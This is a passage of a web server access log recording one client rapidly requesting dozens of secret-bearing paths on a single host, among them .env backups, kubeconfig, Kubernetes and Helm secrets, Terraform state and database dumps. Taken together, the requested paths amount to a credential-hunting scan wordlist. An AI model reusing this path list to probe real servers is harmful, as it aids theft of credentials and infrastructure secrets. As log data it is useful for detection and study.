Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak15" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak8" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup6" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/log/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202404" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v9" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.envrc.private" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202403" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup16" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-04" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/environment" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_19" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/db.sql" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/docker-compose.prod.yml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/payment/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v19" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak18" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak11" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/env.txt" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/environment.txt" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old15" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-11" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak6" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/docker-compose.override.yml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old19" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/stripe/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/kubernetes/secrets.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old5" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v1" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-05" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.17" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-04" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.vercel/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak5" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v16" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/database.sql" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup1" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/nestjs/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-07" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.staging" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/magento/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.netlify/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-05" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/tf/terraform.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup14" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_backup" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/kubeconfig" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/pub/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.4" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/packages/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/terraform.tfstate" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202401" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/planetscale/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-02" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/invoices/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/containers/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/directadmin/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_8" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_18" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/shop/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_2" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.save" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_2024" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/app.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_5" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/plesk/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2026.bak" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/sealed-secrets.yml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup18" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/dev.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup4" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup17" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/kubeconfig.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-12" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202407" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup3" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/amplify/.config/project-config.json" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/backup/.env.2024" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old16" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.idea/workspace.xml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.envrc.local" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/helm/secrets.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v10" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.vscode/launch.json" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup2" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.example" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/application.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/helm/values-production.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/kube/secrets.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak14" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak17" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 